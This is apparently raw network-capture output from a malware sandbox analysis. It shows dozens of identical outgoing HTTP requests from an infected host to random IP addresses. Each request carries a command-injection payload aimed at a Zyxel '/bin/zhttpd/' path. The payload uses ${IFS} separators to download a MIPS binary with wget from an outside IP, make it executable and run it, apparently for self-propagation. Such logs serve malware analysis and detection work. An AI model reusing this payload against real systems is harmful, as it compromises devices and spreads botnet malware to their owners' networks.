                                                  Jan 19, 2024 18:24:11.355926037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8216192.168.2.1333404120.202.64.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355973959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8217192.168.2.133543662.232.78.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356019974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8218192.168.2.1348372106.13.47.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356054068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8219192.168.2.134934857.236.247.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356093884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8220192.168.2.1344538195.30.112.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356137037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8221192.168.2.134063491.16.99.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356182098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8222192.168.2.135723414.208.147.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356220007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8223192.168.2.1359022143.202.141.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356242895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8224192.168.2.1348546191.60.185.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356292963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8225192.168.2.1332770158.198.84.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356332064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8226192.168.2.1355596178.16.134.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356355906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8227192.168.2.1340616169.72.29.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356384993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8228192.168.2.1353324183.140.225.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356411934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8229192.168.2.1353184220.100.9.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356468916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8230192.168.2.133801424.8.94.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356489897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8231192.168.2.133591054.47.191.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356543064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8232192.168.2.1339696131.145.23.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356590986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8233192.168.2.134254041.134.2.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356633902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8234192.168.2.1350534189.123.13.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356673956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8235192.168.2.134534039.190.108.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356723070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8236192.168.2.1335134186.72.6.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356758118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8237192.168.2.135390468.42.194.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356801987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8238192.168.2.133311075.141.63.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356853962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8239192.168.2.1350752125.54.47.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356898069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8240192.168.2.1359694120.225.161.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356935978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8241192.168.2.1352058199.132.163.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.356975079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8242192.168.2.1338072205.47.249.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357012987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8243192.168.2.1354866120.3.74.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357065916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8244192.168.2.1349270186.65.198.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357105017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8245192.168.2.1336364189.48.36.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357134104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8246192.168.2.135735290.91.249.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357175112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8247192.168.2.1357422140.182.197.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357227087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8248192.168.2.135712849.135.5.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357256889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8249192.168.2.134896248.161.54.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357297897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8250192.168.2.134681092.5.139.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357338905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8251192.168.2.1356550163.166.199.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357363939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8252192.168.2.1349098222.12.56.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357403040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8253192.168.2.1358636198.101.219.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357450008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8254192.168.2.1357702207.152.171.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357490063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8255192.168.2.1345746154.239.81.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357542038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8256192.168.2.135757423.80.238.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357577085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8257192.168.2.1340482182.185.7.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357620001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8258192.168.2.135033262.114.110.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357655048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8259192.168.2.1355380179.223.81.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357703924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8260192.168.2.134778659.2.233.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357744932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8261192.168.2.136044836.228.134.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357795000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8262192.168.2.133552481.44.198.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357814074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8263192.168.2.1338224105.105.122.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357862949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8264192.168.2.1349418171.180.26.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357882023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8265192.168.2.135557099.147.123.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357938051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8266192.168.2.1355672171.128.109.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.357964993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8267192.168.2.1348534104.237.133.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358009100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8268192.168.2.1346520167.73.85.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358037949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8269192.168.2.1345328205.150.188.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358079910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8270192.168.2.135468613.255.255.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358114004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8271192.168.2.1343006204.190.169.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358149052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8272192.168.2.134881213.123.72.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358191013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8273192.168.2.1359500116.132.224.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358222961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8274192.168.2.133464837.154.44.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358263016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8275192.168.2.135925814.73.76.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358283043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8276192.168.2.134019465.215.235.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358328104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8277192.168.2.1334558199.134.106.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358350039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8278192.168.2.1354544172.236.152.114443
                                                  TimestampBytes transferredDirectionData
